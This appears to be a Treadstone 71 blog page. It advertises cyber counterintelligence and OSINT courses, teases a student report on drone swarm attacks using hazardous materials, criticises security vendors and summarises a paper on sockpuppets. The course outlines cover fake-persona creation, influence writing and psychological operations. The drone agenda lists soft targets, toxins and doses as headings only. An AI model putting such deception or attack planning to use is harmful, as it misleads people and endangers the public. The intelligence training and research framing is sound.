This course presents the student with foundational concepts and processes in the discipline of cyber counterintelligence with a focus on cyber counterintelligence missions, defensive counterintelligence, offensive counterintelligence, and counterespionage as these realms apply to traditional tradecraft, and how they are or will evolve into the cyber domain. By starting with traditional counterintelligence and progressing to cyber counterintelligence, the student will develop an appreciation for collection efforts, exploitation of potential threats, insider concerns, and the risks and benefits of counterintelligence.

With the expanding importance of the comprehensive and timely need for intelligence for nations as well as businesses, the student will explore the essential elements that make up the intelligence cycle with a focus on how these pivotal points are exploited. As part of this class, the exploration of the continued importance of critical thinking as well as out-of¬the-box analysis will be heavily leveraged to improve the critical-thinking skills of the students.  As cyber topics continue to evolve, the increased importance of cyber intelligence is growing and as such the protection of our intelligence cycles will expand as well; emphasizing the growing need to ensure our processes are not compromised in a cyber-dominated landscape.  Cyber Counterintelligence is one aspect and possibly one of the most crucial topics at the core of protecting our collection efforts. The potential for active defense or offensive cyber counterintelligence operations will be covered.
​
The course will rely heavily on individual research and group discussion to explore the world of cyber counterintelligence, and where applicable, make use of the student’s ability to do independent thinking and analysis of in-class problems assigned through weekly discussion threads. This course focuses on open source intelligence and adversaries while creating online personas to assist in data collection and information extraction. This introductory course examines open source intelligence collection as well as the availability and use of OSINT tools. Students will be able to understand the use methods of only anonymity, the fundamentals behind cyber persona development, enrollment in various social media sites and applications, and how these current methods can be employed in their organizations to assist in operational cyber security, their defense against adversaries, and passive data collection.  The establishment of cyber personas takes patience and time to create a credible resource. Parallel activities occur through the outline above. Treadstone 71 maintains separation from the client as required maintaining confidentiality of methods and processes.

Sitreps and current intelligence may redirect activities. The intent is to establish a program of cyber and open source intelligence that creates data streams for analysis. Data streams take the time to develop to establish links, trends, tendencies and eventually, anticipatory and predictive analysis. The desire is to move from a detective approach to one that is preventive while moving too predictive.

osint@treadstone71.com

888.714.0071

 

 

 

 

Featured post

Treadstone 71 Cyber Intelligence, Counterintelligence, and Target-Centric OSINT Course Overviews

The below information provide non-inclusive overviews of Treadstone 71 Courses.  The courses are listed in order of suggested training. Courses may be taking separately or as a package. Course requests and modifications acceptable. These are high-level outlines. The courses teach intelligence tradecraft with a focus upon intelligence analysis, methods, tactics, techniques, procedures, and operational security (OPSEC).

Upcoming Classes

For more information: osint@treadstone71.com or 888.714.0071

Cyber Intelligence Tradecraft Certification

This course is highly specialized following intelligence community tradecraft. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Your enemies scour blogs, forums, chat rooms and personal websites to piece together information that used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT, and Cyber-OPSEC effectively equips students with the tools to gather data points, transform these data points into actionable intelligence that prevents target attacks.

The course includes:

CYBINT1 – Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy – (Case Study 1)

CYBINT2 – Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates – (Case Study 2)

CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypothesis, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.

CYBINT4 – Table Top Exercises (TTXs), Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations

Lecture, Hands-on, Apprenticeship, in class exercises (3 Live Case Studies), student presentations, analytic products, templates, course material—40 CPEs (5-days – 40 hours)

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Cyber Counterintelligence http://www.planetreg.com/CounterIntel

This course presents the student with foundational concepts and processes in the discipline of cyber counterintelligence with a focus on cyber counterintelligence missions, defensive counterintelligence, offensive counterintelligence, and counterespionage as these realms apply to traditional tradecraft, and how they are or will evolve into the cyber domain. By starting with traditional counterintelligence and progressing to cyber counterintelligence, the student will develop an appreciation for collection efforts, exploitation of potential threats, insider concerns, and the risks and benefits of counterintelligence.

With the expanding importance on the comprehensive and timely need for intelligence for nations as well as businesses, the student will explore the essential elements that make up the intelligence cycle with a focus on how these pivotal points are exploited. As part of this class, the exploration of the continued importance of critical thinking as well as out-of¬the-box analysis will be heavily leveraged to improve the critical-thinking skills of the students.  As cyber topics continue to evolve, the increased importance of cyber intelligence is growing and as such the protection of our intelligence cycles will expand as well; emphasizing the growing need to ensure our processes are not compromised in a cyber-dominated landscape.  Cyber counterintelligence is one aspect and possibly one of the most crucial topics at the core of protecting our collection efforts. The potential for active defense or offensive cyber counterintelligence operations will be covered. The course will rely heavily on individual research and group discussion to explore the world of cyber counterintelligence, and where applicable, make use of the student’s ability to do independent thinking and analysis of in-class problems assigned through weekly discussion threads.

Cyber CI Team Presentations: Cyber Infiltration, Information Operations, Information Support Operations

  • National Counterintelligence Strategy
  • Standard Glossary and Taxonomy
  • Mission Based Counterintelligence
  • Counter Collection and Anticipation
  • Denial and Deception
  • Counter-Denial and Deception
  • Cyberspace
  • The Cyber Persona Layer
  • Perception as Deception
  • Social Psychology
  • Differences in Culture
  • Hofstede Dimensions
  • Includes open source tool usage
  • Persona creation, establishment, maintenance, expansion (depending upon taking Cyber Intelligence Course)
  • Data collection – recycle for Cyber CI updates/improvements
  • Authoring of blogs and articles for influencing
  • Placement of specific concepts and phrases
  • Target profiles – dossiers
  • Target gap analysis
  • Clearly define the mission so that it aligns with organizational objectives
  • Clandestine Collection
    • Operation
    • Surveillance
    • Counter Surveillance
    • CI Activities
    • CI Analysis and Production
    • CI Analysis Reporting
      • Support Brief
      • Source Evaluation
      • Operational analysis report
      • Asset Evaluation
      • Support Package
      • CI Assessment
      • CI Campaign
        • Mission
        • Mission Management
        • Operations
      • Effects-Based Operations
      • Functions and Services
    • CI Insider Threat
      • Investigations
    • Prepare an estimate of the situation
      • Prepare the plan
        • Support Plan
      • Cyber Media selection
      • Snuggling
      • Internet OPSEC
      • Product development
      • Pretesting – determines the probable impact on the target audience
      • Production and dissemination of material
      • Implementation
      • Post-testing evaluation of audience responses
      • Feedback
    • Ten Commandments of Cyber Counterintelligence
      • Be offensive
      • Honor your profession
      • Own the street
      • Know your history
      • Do not ignore analysis
      • Do not be parochial
      • Train your people
      • Do not be shoved aside
      • Do not stay too long
      • Never give up
    • Research and analyze methods of influencing adversaries from a variety of information sources
    • Team/Individual Presentations

Lecture, Hands-on, Apprenticeship, in class exercises (Live Case Studies), student presentations, templates, course material—30 CPEs 4-days

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Target-Centric Open Source Intelligence

This course focuses on open source intelligence and adversaries while creating online personas to assist in data collection and information extraction. This introductory course examines open source intelligence collection as well as the availability and use of OSINT tools. Students will be able to understand the use methods of only anonymity, the fundamentals behind cyber persona development, enrollment in various social media sites and applications, and how these current methods can be employed in their organizations to assist in cyber operational security, their defense against adversaries, and passive data collection.  The establishment of cyber personas takes patience and time in order to create a credible resource. Parallel activities occur through the outline above. Treadstone 71 maintains separation from the client as required maintaining confidentiality of methods and processes. Sitreps and current intelligence may redirect activities. The intent is to establish a program of cyber and open source intelligence that creates data streams for analysis. Data streams take time to develop in order to establish links, trends, tendencies and eventually, anticipatory and predictive analysis. The desire is to move from a detective approach to one that is preventive while moving too predictive.

Adversaries scour blogs, forums, chat rooms and personal websites to piece together information that used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT, and Cyber-OPSEC effectively equips students with the tools to gather data points, transform these data points into actionable intelligence that prevents target attacks. Students will learn methods to create and manage personas while passively gathering information leading to cyber street credentials.

The course covers (non-inclusively):

  • Open Source Intelligence
    • Methods of collection
    • Specific tools
    • Social media sites and enrollment
  • Methods of Social Media Research
    • Tools and techniques
    • Social media demographics
    • Cyber Criminals
  • Social Psychology
    • Reciprocity
    • Consistency
    • Social validation
    • Liking
    • Authority
    • Scarcity
  • Differences in Culture
    • Diversity
    • What is …
  • Hofstede Dimensions
  • Big 5 Theory of Personality
  • Information Warfare and Cyber Psychological Operations
    • Target analysis and message manipulation where applicable
  • Establish Priority Intelligence Requirements
    • Establish Information Requirements
  • Persona creation and implementation
    • Cyber Persona Development and Maintenance
      • Leverage existing
      • Create new
      • Establish the storyline
      • Establish the plot synopsis
      • Storyline and plot synopsis
    • Story weaving and management
    • Snuggling
    • Collection
      • Linkages, trends, tendencies
    • Cyber Target Acquisition and Exploitation
      • Validation of target
      • Identify active adversary campaigns
      • Intent, Motivation, Goals, & Requirements.
    • Passive data collection
      • Campaign development
      • Target sites
        • Enrollment
      • Tactics, techniques, and procedures
      • Intent, motivation, goals, and requirements
      • Vectors of approach – Courses of action
      • Elicitation and exfiltration

Lecture, Hands-on, Apprenticeship, in class exercises (Live Case Studies), student presentations, templates, course material—30 CPEs 4-days

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

osint@treadstone71.com 888.714.0071 http://www.planetreg.com/E76722275820

Featured post

Drone Attack! Swarm with Hazardous Waste Payload

Once again the Team Flying Dragon from Kansas State University has created a critical intelligence estimate, this time, looking at drone attacks. The team consists of John Boesen, Randy Mai, Carrie Padgette, TL Vincent Salerno with oversight and tutelage from Professor Randall K. Nichols. 210 slides of detailed information focused on hazardous waste in the US and the use of drones to cause harm. The full report is available upon request from Treadstone 71 at osint@treadstone71.com – Please provide your name, title, and corporate / university / government email address for access to the report. flydragons

The Agenda

  • Executive Summary
  • Targets: Defenseless Universities (soft targets)
  • Hazardous Material Handling: PPE, antidotes, transport, logistics
  • Substances Used: toxins, location, transport, doses
  • Scenario
  • Consequences: effects, aftermath
  • Recommended Actions
  • Conclusions

fluoroMotive of Terrorist Organization implementing drone attacks

  • Armed, capable of targeting individuals, autos, structures
  • Highly effective at targets, maximize targets
  • Lower cost, risk, no risk to user/pilot
  • Punish, deter, disrupt, degrade, dismantle, defeat
  • Influence mass audience
  • Exceptionally effective in undermining populations
  • Alternative means when other activity cannot be accomplished, as attacking US military

This presentation examines among other things ethical and legal dimensions of on-line behavior regarding cyber security and UAS. It is not intended to turn counterterrorism, information technology or forensics investigators professionals into lawyers. Many of the topics discussed will be concerned with the law and legal implications of certain behaviors.

Every effort is made to provide accurate and complete information. However, at no time during this presentation will legal advice be offered. Any student requiring legal advice should seek services of a lawyer authorized to practice in the appropriate jurisdiction.

ksu3.png

This presentation is not about pushing the envelope or hacking, or trying out any of the UAS/UAV/Drone counter-terrorism approaches in our Cases or A/D scenarios in the field.

If you wish to see the complete presentation, contact Treadstone 71 at osint@treadstone71.com

Featured post

Cyber Threat Intelligence – All-Source Intelligence – Successful Program Build

Treadstone 71 has a history of solving difficult security and intelligence issues. Recently we were approached by a very large firm to address their cyber intelligence and cyber threat intelligence issues. This organization (ORG A) had spent millions on cybersecurity vendors. The task given to these vendors included building an all-source intelligence program. They failed to deliver. ORG A performed a search to find an organization able to deliver on the promises of others. All recommendations pointed to Treadstone 71.

http://www.planetreg.com/CounterIntel Cyber CounterIntel Tradecraft Certification

Upcoming Classes

We assessed the situation and status, set to work on the issues, solve the problems, and build a functional program. Like all our clients, we cannot divulge the name, but we do have this reference that validates our claims of complete success:

reference

The program examined all-source intelligence and analytic doctrine from the cyber perspective following traditional tradecraft and lifecycle activities. We assisted and drove the building of intelligence strategic and program plans as well as methods to validate and communicate the plans. Laying the groundwork for an accepted and understood program leadership approved. Our methods ensured successful. The Treadstone 71 Cyber Intelligence Program includes:

  • Strategic Plan development, acceptance, and dissemination
    • Vision-Mission-Guiding Principles-Goals-Objectives
    • 18-Month Plan
  • Program Plan development, acceptance, dissemination, and implementation
  • Standard Operating Procedures—Tradecraft focused
    • Intelligence RACIs
    • Process flows and metrics
  • Priority Intelligence Requirements development
  • Strategic, operational, tactical, and technical intelligence
  • Collection Planning and Management
  • Passive Intelligence Collection
  • Production Planning and Management
  • Organization, Production, Processing – Decomposition
  • Methods of Analysis
  • Structured Analytic Techniques
  • Analytic Writing and Dissemination
  • Report Writing and Serialization
  • Virtual HUMINT Creation and Management
  • Internet Exposure Assessment – Attack Surface Analysis – Perception Management – Sentiment Analysis
  • Darknet, Forums, Social Networking, Closed Sites
  • Deception Detection and Credibility Analysis
    • Denial and deception identification
  • Competitive Intelligence Assessment and Program Analysis
  • Campaign Analysis with Recommendations and Opportunities

The Treadstone 71 Program ensures support for organizational mission and objectives while strengthening intelligence across the enterprise. Something we accomplished with ORG A. The program validates intelligence vision, mission, goals, objectives and intelligence requirements. Treadstone 71 incorporates both revolutionary and evolutionaryCYBERINTELTRAININGS methods. We work with you to establish the framework for creating, improving and measuring your program. Methods proved with ORG A and other clients. Strategic goals and objectives are created and assigned.  The program creates metrics, performance goals, milestones, and roadmaps. Treadstone 71 guides you through the journey anticipating modifications and shifts. We offer training as well with the next bootcamp scheduled for July 17-23 in Denver. The program helps you advance the enterprise intelligence program. Standardize intelligence oversight, peer reviews, and governance as well as clear roles, responsibilities and job families.  We also integrate with customer facing organizations providing advice and guidance on competitive intelligence.  The bottom line is a happy client with all tasks accomplished. We can clean up the messes of the big boys or, you can hire us first to get the job done right, done once.

The Treadstone 71 program applies in-depth, substantive expertise, corporate and organizationally specific information and tough-minded tradecraft to product and provide distinctive value-added recommendations and opportunities advancing corporate leadership’s needs while improving organizational business interests. Contact us now to learn how Treadstone 71 can transform your cyber and threat intelligence program.  osint@treadstone71.com – 888.714.0071

http://www.treadstone71.com

Featured post

The most dangerous thing in the world is a Second Lieutenant with a map and a compass.

The recent excuse by FireEye and other technology firms that their stock is tanking due to China, not hacking is largely an unsupported and completely self-serving hypothesis. They offer no other hypothesis other than the one that gives them an excuse for selling products that do not work, for appeasing their stockholders and investors, and for delivering services steeped in see, detect, and arrest methods. FireEye bet the farm on typical perimeter sensors used to drive detection after the adversaries are in the client’s environment. They doubled down by buying Mandiant,wsj1 an organization focused on putting ‘butts in seats’ for incident response. That would be seats in your organization at a very high cost. Incident response, another function based upon a defeatist mentality using a “kill chain” that kills the adversary and/or the malware that has already penetrated the environment. Much like letting an armed burglar into your home out of fairness and then starting a shootout. Now we see a CEO change over that will surely drive the focus to more incident response marketing. Add that to the latest purchase of an overpriced iSight, a threat research firm that creates once and delivers many and you have a recipe for poor stock performance. Congratulate Mr. Waters on getting out when he did and seeing that an IPO was not in the cards. iSight has even been asked by some firms to build threat intelligence capabilities. Something completely anathema to iSight’s strategy and something they are not capable to deliver in the first place. // We know. We have cleaned up what they have left behind. // They are a research firm.  They create reports. They sell the same report to everyone.

The second part of their complete market arrogance is the statement (WSJ) that none of the 22 Chinese APT groups it tracks are actively attacking U.S. companies. So FireEye has wsj2.png

WSJ – http://blogs.wsj.com/chinarealtime/2016/04/22/why-one-cybersecurity-firm-thinks-china-has-soured-on-hacking/

built this huge capability across the globe yet only tracks 22 Chinese groups? // If a tree falls in a forest and no one is around to hear it, does it make a sound? //  FireEye, CrowdStrike, Trend Micro, Checkpoint, Cylance, Palo Alto, HP, Symantec, and others continue to release reports on various groups they track. Do you really believe these groups will continue the same modes of operation once discovered? Is it not possible that the adversaries changed their protocols and tactics in response to the release of intelligence data on their actions? Is it possible that the archaic methods being used by these vendors will not pick up new methods laced with advanced tactics of denial and deception?  Is it possible that these vendors is not seeing activity because they are not as good as they claim they are? The absence of evidence does not mean the activity does not exist. Keep publishing reports on adversaries, tipping your hand on what capabilities you do have and they are bound to make some changes. I guess that is why you call them advanced. Actually, -advanced- this is cyber espionage so let us call it what it is.  Persistent only in the arrogance of such companies selling solutions that truly do not come close to solving the problem. Chest thumping and marketing reports serve to tip-off the adversary forcing them to become more devious instituting wholesale changes in their approaches.  Possibly to the point where you are not seeing the activity since you have not changed along with the adversary. // The enemy diversion you’re ignoring is their main attack. // We are at war. Who in war tells the enemy that their code has been cracked? That their tactics and methods have been discovered? Did the British divulge that fact they had cracked the enigma code? Of course not. They understood the value of intelligence and intelligence exploitation. They understood what was at stake. The cyber security market today is only interested in generating revenue.

Many organizations continue to purchase the perimeter tools and sensors of the FireEyes and Crowdstrikes. The company’s purchasing these products continue to lose data. Until we stop buying carpetbagger solutions we will not force change. We need to demand solutions that are truly preventive and predictive not based upon malware reverse engineering, or methods (kill chain) based upon see, detect, and arrest. // Professional soldiers are predictable; the world is full of dangerous amateurs. // We need to stop believing that companies with leadership trained only in law enforcement tactics truly understand intelligence tradecraft. We need to stop believing that companies with a pedigree in anti-virus understands intelligence tradecraft and offensive methods. We need to understand that stopping the adversary starts with not tipping them off.  We need to stop believing that just because they are a big company, they actually know what they talk about. They don’t. They are just tasked with selling product.

Understand the latest focus on ‘hunt and detect’ is merely an enhancement to the failed attempts at event correlation in SIEMs. Log aggregation and then analysis of the content for tactics, techniques, and procedures is but an improved method of finding adversaries and malware already in your environment. This is not proactive. This is not preventive no matter what the vendors tell you. It is necessary but  not new.

The adversary has changed yet the security technologies used to stop them are rooted in old and failed methods. Time to wake up and invest in something better.

One more area that needs attention are the actual reports coming out of these companies. They are not written in analytic form and format. They do not provide confidence levels. Most importantly, the market takes them on face value without citation of sources, reliability of sources, and credibility of the information. Even news organizations take them at face value. These are journalists who live and die by source and information validation. Actually, they should not be publishing these openly at all but if they must, then we must demand validation of sources. Otherwise, we run the risk of another Norse. It is always interesting when revenues drop and market share suffers, then suddenly a new discovery is made on an adversary resulting a new, unsubstantiated report.

“Never interrupt your enemy when he is making a mistake.”

― Napoléon Bonaparte

“Always interrupt your vendor when they try to sell you snake oil.”

― T71

 

 

Featured post

The Utilization and Management of Sockpuppets within Online Communities – Melissa Morris

Abstract

Image The Internet is the principle arena for online communication. Within the online community, individuals can choose who they are. If a member chooses an online identity that is something other than who they are in real life, then the identity created is a sockpuppet. The purpose of this research was to examine the utilization and management of sockpuppets within online communities. What are the ethical and legal boundaries in the use of sockpuppets within civilian online communities? What is the role of sockpuppets in the intelligence community? The intent behind sockpuppet use determines the ethical and legal boundaries within civilian online communities. If the intent is for entertainment and communication, online communities exhibit various levels of tolerance for ethical versus unethical choices of sockpuppets. However, legal boundaries are crossed if the intent is to do harm. The United States is not consistent with legislation involving sockpuppets. The intelligence community uses sockpuppets to assist in maintaining national security. A sockpuppet allows an analyst to infiltrate targeted online communities, and once inside to gather information about the group. Sockpuppets are accepted within the communities and gain a perspective similar to an offline undercover agent. It takes great effort and skill to create long lasting and believable identities that effectively collect actionable intelligence. Conclusions generated based on a review of the current research include; federal legislation and management defining and clarifying criminal use of a sockpuppet, the creation of a best practices manual for the intelligence community to standardize training and utilization of sockpuppets, as well as continued study of the evolution of the sockpuppet.

You may download the paper (PDF) at the link below.

The Utilization and Management of Sockpuppets – Melissa Morris

Melissa may be reached at: mmorris537@gmail.com 

©Copyright 2014  by Melissa Morris All Rights Reserved

Featured post

Blog at WordPress.com.

Up ↑

%d bloggers like this: